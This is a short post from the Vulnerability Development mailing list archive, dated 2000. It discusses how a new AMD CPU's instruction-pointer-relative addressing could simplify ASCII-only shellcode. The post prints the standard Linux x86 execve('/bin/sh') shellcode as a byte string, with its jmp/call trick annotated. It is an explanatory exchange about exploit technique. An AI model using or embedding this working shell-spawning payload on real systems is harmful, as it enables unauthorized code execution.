Vulnerability Development mailing list archives

Re: AMD Sledgehammer and ascii-only shellcode


From: Holger van Koll <holger () VANKOLL DE>
Date: Wed, 16 Aug 2000 04:33:40 +0200

Holger van Koll wrote:

Hi,

the new AMD CPU has the feature to access data relative to the
instruction pointer.

...

AFAIK it's still considered impossible to code shellcode using only
ASCII data, as commands like jmp and call are not within this range.


Let me add something:

In the "standard-shellcode"

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"  /* jmp +0x1f; pop esi; ... */
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"  /* int 0x80 (execve); ... */
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";                                   /* call -0x24; "/bin/sh" */

you won't have to eliminate the jmp (first command, 0xeb 0x1f) and call
(0xe8 0xdc 0xff 0xff 0xff) commands, as they are not necessary anymore.
They are only used to get the location of the string "/bin/sh" onto the
stack, and as you know how many bytes your code takes, you also know its
location relative to the instruction pointer.

